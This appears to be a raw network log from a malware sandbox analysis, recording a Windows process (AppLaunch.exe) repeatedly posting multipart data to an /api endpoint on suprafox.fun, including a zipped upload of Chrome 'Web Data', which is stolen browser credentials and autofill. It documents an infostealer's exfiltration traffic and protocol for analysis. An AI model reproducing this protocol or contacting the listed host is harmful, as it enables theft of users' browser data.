Oct 24, 2023 00:06:09.912247896 CEST	51	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=1m13378g2h897iclsk4ij4kiuo; expires=Fri, 16 Feb 2024 15:52:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SSBoN9Ly%2FNeX26M8y5eccyV5pv7RufkspUchQw4IE1BfA54azoynW8AogyP2C22sI9msC4Q%2FtXbPrmSOZ%2BBS2Vueugn8k18tjKeNRqZHjWQTzc76glmM56wf310Bumg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad491d8d6b38a3-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:09.912272930 CEST	51	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49749	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:10.023015022 CEST	52	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:10.024168968 CEST	53	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:10.440375090 CEST	54	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=7l57bpibs6mf5drnbjnltsrcsj; expires=Fri, 16 Feb 2024 15:52:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7KxV0pFOteLHTIViWCsZihC6vspk7JZKhac6Y2WGITqeRkBC6X5aGEGaTmYiymOF21FdZSsAGSalk1gvzsilZ8jTB9kyNn4yQGiGD8%2BR%2BXmj21eOksLgOGkpHPCXBQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4920dfc0595b-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:10.440561056 CEST	54	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49750	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:10.928529024 CEST	55	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 24178 Host: suprafox.fun
Oct 24, 2023 00:06:10.929316044 CEST	66	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:11.023966074 CEST	67	OUT	Data Raw: 66 a8 f8 06 5d f4 68 d3 1f 02 a1 8e e3 4f 66 42 ab 24 11 ad 94 2e 78 78 c3 61 da 7b d2 c2 e8 4d 76 96 bd fd 46 a1 73 e4 8e 54 fe cc 19 be 53 f6 6e b0 ff fa 65 47 85 ba e2 21 c1 c7 42 37 7a 48 a2 1b e8 c6 03 bd b8 79 94 be 57 4e f2 9d f1 3d 6b d7 Data Ascii: f]hOfB$.xxa{MvFsTSneG!B7zHyWN=k;`awY,fSls43{ aPs`QvSMKR-S'k %tHh/5tappz6oV`?{.U<z$?y'Amoc'dmH3]HT_g
Oct 24, 2023 00:06:11.024455070 CEST	70	OUT	Data Raw: 58 51 d0 33 fb de 3b b6 a5 c7 2d ce 17 e7 e7 16 fe 0f 50 4b 07 08 3d 42 1a 40 97 11 00 00 00 00 00 00 00 70 02 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 d3 00 58 57 00 00 00 00 00 00 00 00 00 00 00 00 17 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 Data Ascii: XQ3;-PK=B@pPKXWChrome/Default/Web DatasF~1r@J;Z!iEq,>4(HdF)au@g3J!q*9!mJN9e+\6[C&S&~zelZuA!>eA
Oct 24, 2023 00:06:11.024507999 CEST	73	OUT	Data Raw: 6c 2e 38 57 ae 7b 1e 22 b1 68 99 6a 2a 3f d7 d0 3b a3 ce b5 e3 0e f4 0a 1d 4f e6 27 ef 27 5b 28 dc 1a c9 49 0f 2f 9f 48 45 11 b5 5c 68 cd 8e 8a fc fc c0 83 cb 9e 2a 6a a6 a6 d6 58 01 4c 8b e8 8a b6 a3 f5 3e 5f 8d 54 bd 37 36 f9 30 b5 ce 51 67 c1 Data Ascii: l.8W{"hj?;O''[(I/HE\hjXL>_T760Qgf!]wlgC)8tjZ%UzZH)G'%D\|*@2<U$%"I=j.zgL')lVK9.&o3U-b#"Z?(J[+zD+FGI5
Oct 24, 2023 00:06:11.024655104 CEST	75	OUT	Data Raw: 02 04 4b c8 87 17 77 b8 f0 02 03 43 a6 58 3b 11 0a dc fd f4 35 34 2d 0d bf 7e 1a 84 d2 b4 37 e4 f3 99 22 06 24 61 4a a4 90 8b bb 1e a0 98 ff 9f 02 f0 a7 f0 af f1 0f 00 04 04 04 04 04 04 04 04 04 04 04 04 04 04 84 7f 32 96 9a 01 a8 1f ac 02 68 62 Data Ascii: KwCX;54-~7"$aJ2hb5-Qh9\|yC@@@@@@@@@@@@@@Jo?.`ao`8'l5>mp42ex@@@@@@@@@@%zrsYb!$dK\T>4F(m%5+
Oct 24, 2023 00:06:11.025291920 CEST	79	OUT	Data Raw: 7b f8 f0 f2 93 0b af 5f ae 33 7a 56 d7 fa ce 7f 64 9b 7e 11 61 f9 4d e9 d1 d5 d1 e7 c7 55 47 bb ac fd 1c 30 de 51 fa aa 73 4e f8 dc f2 cf 09 63 a9 bf e8 47 d3 b7 bf 87 be 7c 73 cd 7a dc a5 54 23 c2 74 a9 84 89 74 b5 44 a6 c6 8a c5 04 75 e5 2f 4f Data Ascii: {_3zVd~aMUG0QsNcG\|szT#ttDu/OXTojF"s~T@OAno}w\|P?-Si&\Knj/]'I+)!'\&e6dEC\|mX)Xl
Oct 24, 2023 00:06:11.520572901 CEST	80	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=herggk40p3ln47628but4gn0cb; expires=Fri, 16 Feb 2024 15:52:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aU4ws4wp2v7emuSe9BL5g33bUAmOUCwnvCJRH4N5xXluoseuJOOmpQUK3xukFHt1NJqaauRJvaVAQGlQdSswJYazgSjOt%2F9dEMrgSaEDTqWSkDbbTg8YzkZzOQ%2Fs5s4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49268800826e-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:11.520591021 CEST	80	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49751	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:11.869568110 CEST	81	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:11.870296001 CEST	82	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:12.278526068 CEST	83	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=tk250qs7397a6q0pvb8rcnunfq; expires=Fri, 16 Feb 2024 15:52:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yimKB3I0ysEx5jbEy5yM0HZj%2FgZeWcMIIsSZ5KcgcyKvs4VSmgn3AKH5B7VeH0LKsJuKVYiZYI%2BzmVOB7eHKSzkI%2Bvu7mYDBthAOuUrjDmNMcdTZt1%2BPxgq4LWCjuIY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad492c6e88388b-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:12.278544903 CEST	83	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49752	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:13.035990000 CEST	84	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:13.036758900 CEST	84	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:13.456218004 CEST	86	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=52f7ubr5tn4lb62rl6rdmejgum; expires=Fri, 16 Feb 2024 15:52:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yTz24QL50xFbExMCIPzWMNbItVWijL6SgmyVtzDslHrSHiVFJbNC3XqDg1Os4snp1GHEn8kc%2FD9JckGUZaQCdXDjQHGW1H6Qor2qgXRLvsM9MFGyIhD%2FrV9nz69oeUo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4933bf589c4e-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:13.456239939 CEST	86	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49753	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:14.096842051 CEST	86	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:14.097748995 CEST	87	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:14.532269001 CEST	88	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=4lddd16lgnfrnq5om64gane5nh; expires=Fri, 16 Feb 2024 15:52:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e5WDMd6xAJzQg5qktOxfNXySBxKGQRVwZ%2Fi8iTQLzSBrdWAiLJxxHEi3jRZxo8VvIT9NBUA7%2BzDFYPXl5lfKmh7owhbsoaz2iaYQXx4XAByQyWjZhpDGAIcgs4jCa6M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad493a5e17057f-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:14.532294035 CEST	88	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49754	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:14.640863895 CEST	89	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:14.641531944 CEST	90	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:15.070806980 CEST	91	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=fdp0dvgni448dtrbf0sii9ua9i; expires=Fri, 16 Feb 2024 15:52:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aveFMvZXsLRTFrJNKkc8KYXKLH8BYP9sW4kvVJ4CImJDsZrSJUHEbl6lQolyJSGwZqiMxP0gJFKTTjM2LYkGJQ26DPYzjGcZZ0mnALvFIMHbYwhJcnwricbmUhTkTJY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad493dbf6b2430-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:15.070836067 CEST	91	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49755	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:15.181073904 CEST	92	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:15.181890011 CEST	92	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:15.592490911 CEST	94	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=hjnd5np9e1osm5naj6v8kfau91; expires=Fri, 16 Feb 2024 15:52:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XKzzIUEqW70NQnYAudceGqv4GMjrAX728m52ThigjT6J6uosC%2Fgr84lHzea6einFUJ%2BZFPVJHvwD6h0J1dvXzoNyd904OaLt9Hr%2FTqSJZ2yJBA6B%2FCecFSjfBwfi32c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad494119a51fd0-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:15.592516899 CEST	94	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49757	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:15.701234102 CEST	95	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:15.701946974 CEST	95	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:16.129363060 CEST	101	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=16fqjgr0bnr5ffv7nic0j9u5to; expires=Fri, 16 Feb 2024 15:52:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UmkOtLjOSYtt6Jz8mObRXYwJoldm0ccTQq5SnrELFbKx%2B6ZvczkbU%2FgWkOQIS6SIovDKiky1D4z5YXTS35Z3U2M8zCry2cHcJJeBTqndbEua1WaPMXdC53WJdB%2B0WRI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49445b31093d-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:16.129403114 CEST	101	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49758	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
